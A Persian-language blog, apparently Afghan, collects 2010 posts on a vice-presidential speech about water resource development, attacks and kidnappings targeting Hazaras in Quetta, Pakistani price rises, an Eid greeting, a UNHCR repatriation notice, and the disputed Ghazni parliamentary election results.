متن بيانيه جلالتماب استاد خليلي معاون رياست جمهوري به مناسبت برگزاري دومين کنفراس ملي انکشاف و مديريت منابع آب افغانستان:« آب براي حيات»

   16/9/1389
﴿بسم الله الرحمن الرحيم﴾


جلالتمابان، نمايندگان و سفراي کشورهاي دوست،مهمانان عاليقدر، خانم ها و آقايان!
السلام عليکم و رحمت الله و برکاته!


بسيار مسرت دارم که در دومين کنفراس ملي انکشاف و مديريت منابع آب افغانستان که به منظور کاهش فقر و افزايش رفاه عامه برگزار گرديده شرکت نموده و فرصت صحبت و گفتگو در مورد مديريت و اشد نيازمنديهاي کشور به منابع آبي را به عنوان يکي از برنامه ها و اولويتهاي اساسي دولت در جهت رشد و توسعه پايدار بدست آوردم.
اجازه دهيد که از تلاشها و زحمتهاي تمام برگزارکنندگان اين کنفراس، بخصوص از وزارت انرژي و آب و اداره انکشاف بين المللي ايالات متحده آمريکا به جهت تدوير اين کنفراس ملي قدرداني و سپاسگزاري نمايم.
اميدوارم با توجه به اهميت و نقش حياتي آب براي افغانستان از جوانب مختلف؛ دستاوردها و نتايج دومين کنفراس ملي آب باعث شناخت و همچنين رفع هرچه بيشتر موانع انکشاف منابع آب شده و نقطه عطفي در روند ايجاد زير بناها و تاسيسات آبي کشور گردد.

حضار ارجمند!

افغانستان به عنوان يک کشور در حال رشد و توسعه نياز مبرم به انرژي دارد. يکي از منابع نسبتاً ارزان تامين انرژي، استفاده از منابع آبي مي¬باشد. خوشبختانه در اين زمينه افغانستان از توانمندي خوبي برخوردار بوده و داراي منابع سرشار آبي است که در صورت استفاده بهينه مي توان تغييرات اساسي را در تامين انرژي مورد نياز کشور بوجود آورد.
از سوي ديگر بحران زيست محيطي يکي از چالشهاي عمده فراروي کشور ماست. چندي پيش دولت مجبور شد که بخاطر کاهش آلودگي هوا يک روز هفته را در کابل تعطيل اعلام نمايد. نيروگاههاي آبي توليد برق بدليل استفاده نمودن از انرژي آب از لحاظ زيست محيطي کم ضررتر بوده و لذا توسعه منابع آبي و استحصال انرژي از آن مي تواند درکاهش آلاينده هاي محيطي نيز ممد واقع گردد.
همچنين توسعه و کنترول منابع آبي مي تواند نقش اساسي در رشد و شکوفايي بخش کشاورزي داشته باشد. اقتصاد افغانستان اساسا متکي به زارعت مي باشد. بنا به گزارش ادارات مربوطه از مجموع بيش از هفت ميليون هکتار زمين قابل زرع تنها درحدود کمتر از 2 ميليون هکتار آن قابل استفاده بوده که يکي از چالشهاي عمده اين صنعت، کمبود منابع آبي مي¬باشد.
در يک نگاه کلي مي توان گفت که با توجه به اقليم جغرافيايي و زراعتي بودن افغانستان از يک سو و از سوي ديگر خشکسالي، کمبود منابع انرژي، بحران محيط زيستي، نياز به اشتغال، کمبود منابع طبيعي و شکافهاي اجتماعي حاصله از آن، همه و همه نشان دهنده اهميت دوچندان آب براي افغانستان مي باشد. به عبارت روشن تر، آب يکي از عناصر اصلي توسعۀ پايدار بوده و از نگاه هاي مختلف، براي کشور افغانستان نقش کليدي داشته و به عنوان يک قوه محرکه مي تواند در رشد و شکوفايي زير بناهاي اساسي افغانستان و نيز حل و رفع مشکلات در ساير عرصه ها عمل نمايد.

حضار گرامي!

بايد اين نکته مهم را خدمت همه شما يادآور شوم که موضوع عدم مديريت آب در افغانستان جدي بوده و تنها توانايي استفاده از 3 فيصد آبهاي جاري را داريم. اگر اقدامات و تدابير لازم براي توسعه، مديريت و حفظ منابع آبي در کشور صورت نگيرد، در آينده اي نه چندان دور در عرصه¬هاي گوناگون با بحران عميق¬تر اقتصادي و اجتماعي مواجه خواهيم شد.
با درنظر داشت اهميت اين موضوع ، چند نکته را در ارتباط با چگونگي انکشاف و مديريت منابع آب افغانستان برمي شمارم:

همچنين با توجه به کمبود آب آشاميدني و سطح پايين دسترسي مردم به آب صحي، اميدوارم که اين کنفراس بتواند راهکار خوبي را براي رفع اين معضل و افزايش دسترسي مردم به آبهاي آشاميدني صحي نمايد.
با درنظر داشت فرصتها و چالشهاي موجود، اتخاذ يک پاليسي منسجم و هماهنگ درمورد آب در چهارچوب استراتژي انکشاف ملي افغانستان امري ضروري و حياتي براي افغانستان بوده و امبدوارم که وزارت انرژي و آب تمهيدات لازم را براي حفظ و ذخيره منابع آبي اتخاذ نمايد.
در اخير يکبار ديگر از تمام دست اندرکاران اين سمينار ابراز تشکر و قدرداني نموده و از خداوند متعال موفقيتهاي روز افزون شما را در ساحه عمل خواستارم.
1- تمرکز بيشتري برروي پروژه هاي چند منظورۀ زير بنايي و داراي اولويت که درکنفراسهاي متعدد بين المللي در مورد افغانستان بخصوص در کنفراس کابل نيز پيشنهاد شده اند، صورت گيرد. 2- بدون شک هرگونه توسعۀ پايداري در هر بخش منجمله در بخش آب، بدون توسعه و ارتقاء ظرفيتهاي انساني امکان پذير نمي باشد. بنابراين بايد بخشي از برنامه درازمدت در جهت تقويت و تربيت متخصصان ونيروهاي مسلکي و اجراي پروژه هاي زير بنايي و مديريت بهينه منابع آبي در کشور باشد. 3- خوشبختانه طرح¬ها و پروژه¬هاي وزارت انرژي و آب براي ساماندهي و انکشاف منابع آب آماده بوده اما يکي از چالشهاي عمده بر سر راه تحقق اين پروژه¬ها عدم وجود منابع مالي کافي مي¬باشد. دولت افغانستان از يک سو با توجه به گستردگي پروژه¬هاي زير بنايي دربخشهاي گوناگون و از سوي ديگر کمبود منابع مالي، قادر به تامين هزينه مالي همه پروژها نبوده است.اينجانب از همه کشورهاي دوست و همکار و نيز همه نهادهاي تمويل کننده مي¬خواهم تا با توجه به نقش اساسي آب در حيات اقتصادي، اجتماعي افغانستان هرچه بيشتر دولت افغانستان را در قسمت تمويل منابع مالي پروژه¬هاي زير بنايي آب کمک نمايد. 4- بدون شک ايجاد بندهاي ذخيرۀ آب در مناطق مستعد ضمن آنکه مي¬تواند باعث حفظ و ذخيره سازي منابع آبي و جلوگيري از هدر رفتن آبها شود، از حيث شکوفايي زراعتي و ايجاد تحولات مثبت در اين مناطق نيز مي¬تواندممد واقع گردد
از توجه شما متشکرم
+ نوشته شده توسط آزادگان در 2010/12/13 و ساعت 11:32 AM |
آقای محمد اسلم رئیسانی وزیر اعلی ایالت بلوچستان از یک

 حمله انتحاری نجات یافت اما 12 نفر دیگر زخمی شدند


وزیر اعلی صوبه بلوچستان حوالی ظهر دیروز سه شنبه مورخ 16 قوس سالجاری از جاده رئیسانی به سمت سکرتریت با موتر های محافیظنش در حرکت بود که در ز...نجیر اده سریاب یک فرد انتحار کننده خودش را با مواد انفجاری در نزدیکی موتر حامل آقای رئیسانی و محافظینش منفجر ساخت. آقای رئیسانی طور معجزه آسا آسیب ندید اما همرای یک افسر گارد وی 12 نفر دیگر مجروح شدند.
تن تکه تکه شده فرد انتحار کننده در اطراف ساحه پراکنده شده و ترافیک در تمام جاده های منتهی به جاده سریاب مسدود شدند. عبدالله سخنگوی جام لشکر جهنگوی العالمی مسئولیت حمله بالای آقای رئیسانی را بر عهده گرفته اما علی شیر حیدری سخنگوی لشکر جهنگوی این حمله را رد نموده است
زحمی های حادثه را اول در شفاخانه سیول بعداً در شفاخانه ( سی ایم اچ ) انتقال دادند و وضعیت دو نفر مجروحین این حادثه از سوی شفاخانه وخیم گزارش شده است. ازسوی دیگر شهک بلوچ سخنگوی یونایتید لبریشن فرنت مسئولیت این حمله را نیز بر عهده گرفته و گفته است که این حمله توسط ریموت کنترول صورت گرفته است.
.
آقای رئیسانی به رسانه ها گفته است که حمله کنندگان را میشناسد، آنان را در کوه ها هم تعقیب خواهدکرد.در قتل وی سازش های مذموم وجود دارد که کوشش میکنند بلوچ ها را به خانه جنگی بکشانند. حمله به سردار ها و نواب ها صوبه را به سمت خانه جنگی سوق میدهد. در مورد دست های بیرونی همین لحظه چیزی گفته نمیتوانم. در مورد قتل کنندگان من دارندگان تسلیحاتی قبایل فیصله خواهند نمود. برای مذاکر ه با احزاب بلوچ دعوت صورت گرفته است.
بعد ازنا به سامانی های امنیتی، اختطاف و کشته شدن مردم و تاجران و یک وزیر ایالت بلوچستان این اولین حمله بالای آقای رئیسانی می باشد که دیروز صورت گرفت. مردم حمله دیروز را به شدت محکوم نموده از حکومت میخواهند که به دهشت افگنان فرصت فعالیت بیشتر را ندهد.
+ نوشته شده توسط آزادگان در 2010/12/9 و ساعت 12:13 PM |

مردم ولایت غزنی؛

امید وار اند که وکلای شان برای تمام اقوام این ولایت کار کنند!


برگزاری دومین دور انتخابات شورای ملی افغانستان از آوان برگزاری تا ختم اعلان نتایج نهایی به چالش ها و مشکلات زیادی مواجه بوده و کمیسیون مستقل انتخابات با آنکه از اخذ تدابیر کامل پروسه  پیش از پیش به مردم اطمینان میداد، اما بعد از ساعات اولیه برگزاری انتخابات طولی نکشید که سرو صداهای مردم و کاندیدان مبنی بر تخطی، تقلب وکمبود برگه های رای دهی بلند گردیده نحوه برگزاری و عدم نظارت سالم و درست کمیسیون مستقل انتخابات را به باد انتقاد گرفتند. روز انتخابات با تمام کمی و کاستی هایش به پایان رسید و بعد از ختم روز انتخابات شمارش آرا آغاز گشت. در جریان شمارش آرا تخطی ها و تقلبات در سطح بعضی ولایات کشور پدیدارگشت و هزاران شکایات و تقلبات در نزد کمیسیون مستقل شکایات انتخابات به ثبت رسید و بررسی ها روی آن آغاز گردید. رسیدگی به شکایات نامزدان معترض کار آسان نبود و کمیسیون مستقل شکایات انتخابات وظیفه داشت تا به آن ها رسیدگی میکرد. بعد از گذشت یکماه نتایج اولیه ازسوی کمیسیون مستقل انتخابات اعلام شد، در این اعلام هم تعدادی زیادی از وکلای که در شمارش آرای روز مره برنده بودند ناگهان در سطوح پایین جدول اعلام نتایج ابتدایی قرار گرفتند و بعضی از نامزدان که اصلاً اسمای شان در جدول دیده نمیشدند  ناگهان با آرای بلند در جدول های اعلام نتایج قرار گرفتند که واقعاً برای مردم متحییر کننده بود.

با آنکه روند بررسی تخطی های انتخاباتی با آنکه بسیار به کندی پیش می رفت به همان اندازه فشار گوناگون برسر کمیسیون مستقل شکایات انتخابات وجود داشت. با گذشت زمان نگرانی های مردم هم نسبت به وجود تخطی ها و تقلبات انتخاباتی، سرازیر شدن کارت های جعلی، استفاده از قدرت دولتی توسط عده ای از کاندیدان افزایش میافت. شکایات انتخاباتی پیهم بررسی میشدند، متخلفین انتخابات  از لیست  ها حذف شدند و مردم یکبار دیگر به شفافیت پروسه امیدوار شدند .خوشبختانه کمیسیون های مستقل انتخابات و شکایات انتخابات تحت هیچ نوع فشاربیرونی نرفته با جرئت تمام فیصله های شان را اعلام کردند. مداخله لوی سارنوالی کشور نیز بدور از نظاره رسانه ها و مردم نبود و رسانه ها وظایف اصلی شان را دراطلاع رسانی های دقیق و غیر جانبدارانه انجام داد و در تکمیل  پروسه کمک به سزا داشتند.

تنها چیزی که باعث نگرانی بیش از حد مردم شده بود، داغ شدن اعلام نتایج ولایت غزنی بود. در اعلام نتایج این ولایت حرکت های متعدد صورت گرفت و حتی مسایل قومی نیز در این ولایت مطرح شد. اما کمیسیون  مستقل انتخابات و کمیسیون مستقل شکایات انتخاباتی مکرراً از احکام و فرامین صریح قانون انتخابات و صلاحیت هایشان سخن گفتند و هر نوع معامله و تبانی را برخلاف قانون دانسته و نتایج نهایی سایر ولایات افغانستان را به استثنای ولایت غزنی اعلام کردند. جنجال های اعلام  نشدن نتایج انتخابات این ولایت باعث شد تا همه ی انتقادات و پیشنهادات وکلای شکست خورد ه و معترض انتخابات در حاشیه قرار گیرد و صحفه ی جدید باز شد و بعد از نشست ها و مذاکرات مداوم  حق جایش را گرفت و سر انجام کمیسیون های مستقل انتخابات وشکایات موفقانه توانستند با استفاده از قانون انتخابات نتایج ابتدایی ولایت غزنی را روز گذشته تاریخ 10 قوس سال 1389 نهایی اعلام کنند. این کار کمیسیون ها قابل قدر بوده و هر نهادی که قانون را محترم و مرعی الاجرا قرار دهد، بدون شک هیچگونه بیعدالتی در جامعه صورت نخواهد گرفت. باید بپذیریم که برندگان نتایج نهایی ولایت غزنی همگان از مردم هزاره است، اما آنان باید بدانند که از سهم ولایت غزنی در پارلمان راه یافته و امیدواری مردم ولایت غزنی به این است که وکلای شان برای تمام اقوام این ولایت کار کنند و آرامش و امنیت را به این ولایت آشوب زده برگردانند. در غیر آن  همه ی شان در نزد ملت بزرگ غزنی مسئول خواهند بود. حق را باید به حقدار برسانند و نگذارند برادری اقوام باهم برادر غزنی مخدوش گردیده و شیرازه  ی وحدت ملی وولایتی شان بکشند.

+ نوشته شده توسط آزادگان در 2010/12/2 و ساعت 11:8 AM |
پریشانی مردم  پاکستان از افزایش نرخها  !

درپاکستان فردا نه، بلکه پس فردا عید خواهد بود. هلال کمیتی پاکستان، که متشکل از علمای صاحب صلاحیت کشور پاکستان می باشد، در اول ذی الحجه اعلام کرده بود که روز چهار شنبه 17 نوامبر سالجاری میلادی در پاکستان عید خواهد بود در حالی که در سایر کشور های اسلامی فردا عید است.
کشور پاکستان طبق معمول همه ساله هر دو عید را یکروز بعد از سایر کشورها تجلیل میکند .
مردم پاکستان از افزایش نرخ ها شاکی بوده میگویند که فی کیلو بوره به 125 کلدار رسیده و همینطور یک رس گاب ( گاو ) از 100 تا 250000 کلدار در گنج ها خرید و فروش میشود که آنان توانایی خرید آن را ندارند . مواد خوراکی از قبیل میوه ، آرد و روغن و سبزی جات روز به روز در حال افزایش بوده فی کیلو سیب معمولی به 60 کلدار فروخته میشود .
 همچنین بادنجان رومی هم به 80 کلدار رسیده و پیاز و کچالو هم بیداد میکند .
بعد از اضافه شدن قیمت شکر مردم بعوض آن گور ( قند )  خریداری میکردند تا چای صبح  را با آن سپری و اطفال شان را خوشنود سازند که متاسفانه دلالان و سود خوران در فکر گودام کردن آن افتاده تا با استفاده از مجبوری مردم چند روز بعد آنرا به قیمت بیشتر به فروش برسانند. یک کیلو گور هم , هم اکنون مبلغ 90 کلدار در بازار به فروش میرسد . همچنین با فرا رسیدن عید و سرمای زمستان قیم پوشاک نیز افزایش چشمگیر داشته و مردم غریب از خریدن آنها خود شان را عاجز میدانند .

+ نوشته شده توسط آزادگان در 2010/11/15 و ساعت 2:42 PM |

عید سعید اضحی ( قربان ) مبارکتان باد !


سلام دوستان !


بعد از سپری شدن یکسال بازهم میزبان عید سعید اضحی هستیم . عیدی که از لحاظ معنوی یکی از بهترین عید های مسلمانان به شمار میرود . این عید ، یک عید بسیار پربرکت، نیک و فرخنده محسوب می باشدکه در آن میلیون ها زایر مسلمان از نژاد و رنگ های مختلف به طواف خانه کعبه
 ( خانه خدا ) می پردازند. آرزوی همه یکسان و مشابه است، مشابهت خواستها همانا بخشش گناهان ازخداوند یکتاست . همه و همه در یکجا و در یک محل جمع میشوند تا از خدا طلب بخشش نموده ، برابری و برادری ، وحدت و یکپارچگی شان را به نمایش بگذارند و با تجمعات شان برای جهانیان ثابت سازند که مسلمانان برادر هم اند ، خدا ، قبله و دین شان یکیست و این فرصت برای هیچ دین و آیین دیگر تحقق پذیر نیست جز مسلمانان . در مراسم حج مرز های جغرافیایی مطرح نیست ، دارا و فقیر در کار نیست . همه با لباس یکسان ( کفن پوش ) به خانه خدا سرازیر میشوند تا از خداوند طلب بخشش کنند و خداوند نیز آنان را شرمسار و اندوهگین به خانه هایشان نمیفرستند بلکه وجود آنها را از همه ی گناهان عاری و پاک ساخته مهربانی و بزرگی خود را شامل همه ی شان میسازند و همه ی زیران درگاهش را مورد عفو و بخشش  قرار داده و آنان نیزسر افرازانه به خانه هایشان برمیگردند .

بقیه مسلمانان جهان این عید با عظمت و بزرگ را از اعماق قلب گرامی میدارند ، به مستمندان و بینوایان جامعه شان کمک می کنند ، لباس نو و فاخر پوشیده از مال و مواشی خویش بخاطر جلب رضایت خداوند یکتا و بی نیاز قربانی میکنند .  قربانی های شان را به فقرا و بیچارگان، به همسایه ها و دوستان شریک ساخته سفره های همگی را رنگین میسازند ، زیرا همه در فکر نیازمندان و تهی دستان اند ، همگی در فکر بخشش و جلب رضایت خدا .

دین اسلام بهترین دین دنیاست ، دینی که از هر لحاظ کامل جامع ، رهنما و مهربان می باشد . عید ها بهانه ی اند برای رجو کردن به مهربانی های خدا و کمک به بندگان خدا . خداوند کسی را دوست دارد که از مالش به فقرا و نیازمندان کمک کند . خداوند کسی را دوست دارد ، که دوست خدا باشد و از اوامر او اطاعت و پیروی نموده و صله رحم داشته باشد .

خداوند آنقدر بزرگ و مهربان است، که توصیف بزرگی آن در کلام ها نمی گنجد ، قلم از نوشتن آن عاجز میماند.خداوند ارحم الرحمین است، بخشش او شامل حال هرکسی شده میتواند به شرطی که مقام او را دوست و معظم بداند .

عید سعید اضحی ( قربان ) را برای همه ی مسلمانان جهان و بخصوص برای ملت شریف و سرافراز افغانستان که در هر جای دنیا هستند از صمیم قلب
تبریک و تهنیت گفته از ایشان تقاضا مندم که برادران و خواهران فقیر شان را از یاد نبرده و آنان را یاری و دستگیری کنند .

مرتضی خرمی

+ نوشته شده توسط آزادگان در 2010/11/15 و ساعت 11:15 AM |
محمد ادریس هزاره تاجر ممتاز شهر کویته و مالک دواخانه برکت اختطاف و محافظش کشه شد .

رسانه ها گزارش داده میگویند، که  روز پنجشنبه مورخ 20 عقرب سال 1389/  11 نوامبر سال 2010 میلادی ، محمد ادریس هزاره تاجر ممتاز شهر کویته و مالک دواخانه برکت ( برکت مدیکل ستور ) در حالیکه از خانه به سمت دواخانه اش می رفت ، در نزدیکی دواخانه واقع طوغی رود توسط مردان مسلح اختطاف و محمدعلی محافظش حین ایجاد مزاحمت توسط اختطاف چیان در جا  کشته میشود . اختطاف چیان محمد ادریس هزاره را اختطاف و از ساحه موفق به فرار میشوند .
پولیس بعد از یافتن اطلاع به محل واقعه میرسند و ساحه را تحت محاصره خویش قرار داده  جسد محمدعلی را به شفاخانه سیول انتقال و از آنجا به ورثه هایش تسلیم میکند. پولیس گفته است که تحقیقات لازم را در زمینه آغاز کرده است .
اتحادیه تاجران شهر کویته از وقوع این واقعه شدیداً اظهار نگرانی نموده او
حزب هزاره دموکراتیک نیز طی بیانیه ای  واقعه مذکور را شدیداً محکوم و از تامین امنیت ناقص حکومت و نیروهای امنیتی انتقاد نموده است .
گفته میشود این واقعه در چند متری حوزه پولیس قاید آباد صورت گرفته است
هزاره دموکراتیک پارتی گفته است که در این اواخر تعداد زیادی از تاجران شهر کویته کشته و یا اختطاف شده اند که بیشتر شان متعلق به مردم هزاره می باشند . این حزب از حکومت خواسته است که بخاطر حفظ جان  و مال مردم اقدامات موثری را روی دست گیرد در غیرآن یکروز مردم به ستوه آمده جلو این نوع کار ها را خواهند گرفت  که آنوقت مسئول همه چیز خود حکومت خواهد بود .
اتحادیه تاجران و حزب هزاره دموکراتیک ضمن عرض تسلیت خواهان اقدام فوری حکومت جهت بازیابی و رهایی محمد ادریس هزاره و گرفتاری قاتلان محمد علی شده اند .
+ نوشته شده توسط آزادگان در 2010/11/12 و ساعت 2:13 PM |

ازدواج دسته جمعی دهها زوج جوان هزاره در هرات / عکس

دهها زوج جوان، زندگی مشترکشان را در یک ازدواج دسته جمعی جشن گرفتند.

شروع یک زندگی در بامیان

+ نوشته شده توسط آزادگان در 2010/11/9 و ساعت 2:57 PM |

چهار نفر از مردم هزاره بازهم در کویته به شهادت رسیدند !

با عرض تاسف باید بگویم ، روز پنجشنبه مورخ ۲۸ اکتوبر سال جاری میلادی  چهار نفر از مردم هزاره در مسجد رود شهر کویته به شهادت رسیدند . قربانیان این حادثه به نامهای علی اکبر، صمد، جعفر عباس و عابد می باشند و همه ی این چهار نفر از مردم هزاره می باشند.

حمله زمانی صورت گرفت که این چهار نفر سوار ماشین بودند و به طرف خانه هایشان می رفتند. 

در طی دو ماه اخیر این چندمین حمله ایست که بر مردم هزاره در شهر کویته صورت می گیرد اما  تا حال عاملان هیچ کدام از ترور های زنجیره ای از سوی پولیس دستگیر نشده است .

+ نوشته شده توسط آزادگان در 2010/10/31 و ساعت 7:13 PM |

اطلاعیه

يو ان ايچ سی آر اسلام آباد

معلومات در باره عودت کنندگان

۲۷ اکتوبر ۲۰۱۰

۵ عقرب ۱۳۸۹

مراکز عودت داوطلبانه  " يو ان اچ سی آر  " به نسبت فرارسیدن فصل سرما مسدود ميشوند!

به اطلاع تمامی فاميل های مهاجرين افغان مقيم پاکستان که به کمک پروگرام راه اندازی شده عودت داوطلبانه  " يو ان اچ سی آر " به وطن شان عودت مينمايند رسانيده ميشود ، که پروسه عودت داوطلبانه به نسبت رخصتی  زمستانی و رسیدن فصل سرما مسدود ميشود.

تمامی فاميل های که ميخواهند پيش از رخصتی عودت نمايند الی تاريخ ۳۱ اکتوبر سال جاری  میلادی  به مراکز عودت (وی آر سی) در بلوچستان واقع بليلی و در پشاور واقع څمکنی مراجع نمايند.

از تمامی مهاجرين افغان خواهشمنديم تا به مراکز عودت " يو ان اچ سی آر  " واقع بليلی کویته  و څمکنی  پشاور قبل از باز شدن مراکز مذکور الی بهار سال آینده مراجعه نه نمايند.

مراکز عودت " يو ان اچ سی آر  " در افغانستان برای نهايی نمودن پروسه جاری برای يک هفته ديگر بعد از تاريخ اعلان شده فعال خواهند ماند.

مهاجرين محترم ميتوانند برای بدست آوردن معلومات بيشتر به شماره های ذیل  از ساعت  ۸ صبح الی ساعت  ۸ شام  در همه روز های هفته  تماس گیرند .

اسلام آباد:                ۰۳۰۰۵۰۱۸٦۹۸

کويته:                          ۰۳۳۳۷۸۱۹٦۰۱

پشاور:                           ۰۳۰۰۸۵۸۵٦۰۰

تمامی همکاری های  " يو ان اچ سی "  آر مجانی ميباشند در صورت هر نوع اخذ پول لطفاً به شماره های داده شده اطلاع دهيد.

ترجمه ، نشر و تکثیر : اتشه امور مهاجرین و عودت کنندگان  افغانی در کویته

+ نوشته شده توسط آزادگان در 2010/10/29 و ساعت 2:14 PM |

غزنی: تاوان عقب مانده گی قبیله را باید هزاره ها بپردازد

ولایت غزنی در پارلمان کشور 11 نفر سهم دارد وامسال این یازده تن همه مربوط به قوم هزاره اند. هزاره ها هشتاد فیصد نفوس ولایت غزنی را تشکیل میدهند اما بنا به فرهنگ فاشیزم قبیلوی همیشه درحاشیه رانده شده اند. امسال درانتخابات پارلمانی صدها حوزه ی رای دهی از طرف کمیسیون انتخابات منحل شد و ورقه های رای هم به اندازه ی کافی فرستاده نشد. درولایت غزنی، رای گیری درمناطق پشتون نشین به خاطر تهدیدات طالبان یاهم انتخابات برگزار نشد ویاهم شرکت مردم درانتخابات خیلی کم رنگ بود. درولسوالی گیرو ولایت غزنی که کاملا پشتون نشین است فقط هشت نفر درانتخابات پارلمانی امسال رای داده اند. اما درمقابل در ولسوالی های هزاره نشین غزنی که ازنگاه امنیتی هیچ مشکلی وجود نداشت، دربسیاری از حوزه های رای گیری، دراولین ساعات شروع انتخابات ورقه های رای تمام شد طوریکه درولسوالی مالستان 5600 نفر از رای دادن محروم شدند. درولسوالی جاغوری چهارده هزار نفر به خاطر نبود ورقه رای دهی نتوانستند رای دهند ودر ولسوالی های ناهور، سرآب و خواجه عمری هم نزدیک به هفت هزار نفر از رای دادن باز ماندند. در ولسوالی قره باغ که نزدیک به شصت درصد نفوسش هزاره می باشد نیز انتخابات برگزار نشد ومردم درحوزه های رای دهی ازپیش تعیین شده تا ساعت چهار عصر منتظر ماندند.

ازسوی دیگر نظر به تهدید های امنیتی ، در مرکز ولایت غزنی نیز هزاره ها نتوانستند درانتخابات شرکت کنند. حالا کرزی میخواهد هزاره های غزنی را که به قیمت خون شان با وجود تهدید های امنیتی درانتخابات شرکت نموده وبه نماینده های دلخواه شان رای داده اند را قربانی دموکراسی ستیزی و وحشی گری قبیله اش نماید.

تاکنون یک نامزد انتخابات از مردم هزاره به شمول چندین تن از مردم عادی توسط تروریستان طالب در جریان انتخابات کشته شده اند. طالبان برخی از مسیرهای عبور و مرور و راه ها را بر مردم هزاره بسته و ضمن اخاذی، امنیت جانی آنان را با مشکل جدی مواجه کرده اند.

به نظر می رسد تاوان عقب مانده گی قبیله و حامیان طالبان را اکنون باید مردم هزاره بپردازند که در ده سال اخیر نشان داده اند در پروسه های دموکراتیک پیشتاز می باشند.

نهادهای انتخاباتی افغانستان:

براساس مصلحت سیاسی اقدام نمی کنیم

حامد کرزی

حامد کرزی: در برخی از ولایات افغانستان، انتخابات آن گونه که باید می شد، نشد

نهادهای انتخاباتی افغانستان نسبت به ابراز ناخرسندی رئیس جمهوری این کشور از نتیجه انتخابات پارلمانی و توصیه او برای رفع "نقیصه" این انتخابات واکنش نشان داده و گفته اند که براساس ملاحظات و مصالح سیاسی تصمیم گیری نمی کنند.

روز دوشنبه، 3 مهر/میزان (۲۵ اکتبر)، حامد کرزی، رئیس جمهوری، در یک نشست مشترک خبری با امامعلی رحمان، رئیس جمهوری تاجیکستان، در مورد انتخابات اخیر پارلمانی افغانستان گفت که در برخی حوزه های انتخاباتی، نمایندگان مردم به پارلمان راه نیافته اند.

او در پاسخ به خبرنگار تلویزیون دولتی افغانستان گفت: "در برخی از ولایات افغانستان، انتخابات آن گونه که باید می شد، نشد. به ویژه در ولایت غزنی ۱۲ ولسوالی (شهرستان) از این انتخابات محروم شدند."

آقای کرزی با تاکید بر لزوم حفظ و تقویت وحدت ملی، افزود: "کمیسیون انتخابات و کمیسیون شکایات انتخاباتی بخاطر تامین وحدت ملی و مصالح ملی، در باره غزنی و برخی از ولایات دیگر، که در آنها انتخابات درست برگزار نشده و نمایندگی از مردم به گونه ای که باید صورت می گرفت، صورت نگرفته، اقداماتی را انجام دهند تا این نقیصه رفع شود."

آقای کرزی توضیح نداد که منظورش از اینکه "نمایندگی درست" از مردم در غزنی صورت نگرفته است، چیست، اما ناظران گفته که احتمالا اشاره او به موفقیت نامزدهای هزاره تبار و ناکامی نامزدهای پشتون تبار در انتخابات این ولایت باشد.

براساس نتایج اولیه انتخابات، تمامی یازده کرسی ولایت غزنی در مجلس نمایندگان افغانستان به نامزدهای هزاره اختصاص یافته و هیچیک از نامزدهای پشتون موفق به کسب آرای لازم برای راه یابی به مجلس نشده است.

احمد ضیا رفعت

رفعت:

 ما نگرانی های رئیس جمهوری را درک می کنیم، اما متعهد به قانون هستیم

فضل احمد معنوی، رئیس کمیسیون مستقل انتخابات در این مورد که کمیسیون برای تغییر این وضعیت می تواند چه اقدامی بکند، به بی بی سی گفت که این کمیسیون بر اساس ملاحظات و مصلحت اندیشی های سیاسی تصمیم نمی گیرد.

آقای معنوی گفت: "موضوعات سیاسی قضیه طبیعی است که مربوط به کمیسیون مستقل انتخابات نمی شود و نمی تواند بر مبنای مصلحت های سیاسی تصمیم بگیرد."

آقای معنوی اما در بخشی از سخنان خود گفت: "وقتی دیده می شود که توازن قومی رعایت نشده و به هر حال کسانی (به مجلس) راه نیافته اند، که از لحاظ وحدت ملی می تواند برای آینده کشور بسیار مفید نباشد، باور من این است که کمیسیون شکایات انتخاباتی و در مواردی هم کمیسیون مستقل انتخابات می تواند مطابق به قانون تصمیم بگیرد. اما تا اکنون تصمیمی در این ارتباط گرفته نشده است."

اما احمد ضیا رفعت، عضو و سخنگوی کمیسیون شکایات انتخاباتی ضمن یادآوری این موضوع که این کمیسیون "نگرانی های آقای رئیس جمهوری را درک می کند"، گفت که کمیسیون شکایات انتخاباتی در دایره معیارهای قانونی تصمیم می گیرد و نه خارج از آن.

رئیس جمهوری نمی تواند از طریق به کار بردن وسیله ای غیرقانونی این مشکل را رفع کند. یعنی (تعداد نمایندگان) هزاره ها را کم کند و (تعداد نمایندگان) پشتونها را زیاد کند، این ممکن نیست

کبیر رنجبر

آقای رفعت افزود: "تصمیم های این کمیسیون در رابطه با سرنوشت انتخابات هر محل، هر مرکز و هر حوزه رای گیری افغانستان تابع قانون است."

او تاکید کرد: "این کمیسیون خود را متعهد می داند که نسبت به سرنوشت انتخابات عادلانه و قانونی رفتار کند."

سخنگوی کمیسیون شکایات انتخاباتی همچنین گفت: "ما به همه رای هایی که به صورت قانونی استعمال شده باشد، نتیجه هر چه که باشد، احترام می گذاریم."

آقای رفعت افزود که کمیسیون شکایات انتخاباتی صلاحیت داوری در مورد نتیجه انتخابات را ندارد بلکه داوری های آن تنها بر مبنای قانونی بودن و عادلانه بودن انتخابات است.

قوانین افغانستان نمایندگی در پارلمان این کشور را صرفا حاصل آرای آزاد مردم می داند و به تناسب قومی مجلس اشاره ای نکرده است.

سئوالی که در حال حاضر مطرح است این است که آیا از لحاظ قانونی، این امکان وجود دارد که نامزدهای قومی که بر اساس نتایج انتخابات برنده نشده اند، با تلاش مقامهای دولتی به مجلس راه یابند و برندگان کنونی انتخابات از عضویت در مجلس محروم شوند؟

فضل احمد معنوی، رئیس کمیسیون انتخابات

معنوی: مسائل سیاسی مربوط به کمیسیون مستقل انتخابات نمی شود

کبیر رنجبر، حقوقدان و عضو کنونی مجلس گفته است که در حال حاضر هر اقدامی برای تغییر نتایج انتخابات ناممکن است.

آقای رنجبر گفت: "یقینا انتخابات بر اساس قانون انتخابات در کشور عملی شد، ولی در بسیاری از مناطق تعدادی از هموطنان ما از حق رای دادن محروم شدند و علت محرومیت آنها عدم امنیت بود."

او افزود: "به همین مناسبت است که من فکر می کنم که این مشکل به وجود آمده و رئیس جمهوری نمی تواند از طریق به کار بردن وسیله ای غیرقانونی این مشکل را رفع کند. یعنی (تعداد نمایندگان) هزاره ها را کم کند و (تعداد نمایندگان) پشتونها را زیاد کند، این ممکن نیست، این غیرممکن است؛ برای این که انتخابات صورت گرفته و به ولسی جرگه (مجلس نمایندگان) از طریق انتصابی کسی آمده نمی تواند."

کمیسیون انتخابات افغانستان نتایج اولیه انتخابات را روز ۲۸ میزان/مهر اعلام کرد و قرار تا دو هفته دیگر نتایج نهایی این انتخابات رسما اعلام شود.

